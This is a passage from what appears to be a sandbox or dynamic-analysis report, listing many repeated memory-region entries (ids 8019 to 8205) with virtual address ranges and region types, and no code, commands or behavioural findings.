0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8019 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8020 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8021 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8022 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8023 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8024 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8025 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8026 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 8027 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8028 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8029 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8030 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 8031 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8032 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8033 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8034 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8035 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 8036 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8037 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8038 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8039 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8040 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8041 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8042 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8043 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8044 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8045 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8046 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8047 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8048 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8049 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8050 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8051 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8052 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8053 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8054 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8055 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8056 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8057 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8058 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8059 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8060 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8061 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8062 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8063 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8064 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8065 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8066 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8067 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8068 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8069 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8070 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8071 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8072 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8073 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8074 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8075 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8076 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8077 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8078 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8079 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8080 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8081 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8082 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8083 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8084 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8085 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8086 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8087 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8088 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8089 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8090 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8091 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8092 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8093 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8094 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8095 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8096 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8097 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8098 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 8099 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8100 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8101 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8102 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8103 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8104 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8105 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8106 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8107 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8108 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8109 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8110 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8111 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8112 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8113 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8114 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8115 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8116 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8117 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8118 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8119 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8120 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8121 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8122 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8123 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8124 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8125 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8126 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8127 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8128 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8129 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8130 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8131 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8132 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8133 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8134 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8135 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8136 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8137 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8138 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8139 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8140 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8141 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8142 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8143 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8144 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 8145 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8146 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8147 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8148 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 8149 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8150 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8151 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8152 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8153 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8154 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8155 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8156 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8157 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8158 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8159 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8160 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8161 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8162 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8163 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8164 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8165 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8166 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 8167 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 8168 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8169 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8170 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8171 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8172 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8173 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8174 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8175 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8176 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8177 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8178 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8179 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8180 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8181 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8182 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8183 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8184 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8185 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8186 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8187 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8188 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8189 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8190 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8191 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8192 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8193 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8194 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 8195 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8196 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8197 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8198 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8199 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8200 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8201 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8202 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8203 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8204 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 8205 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = 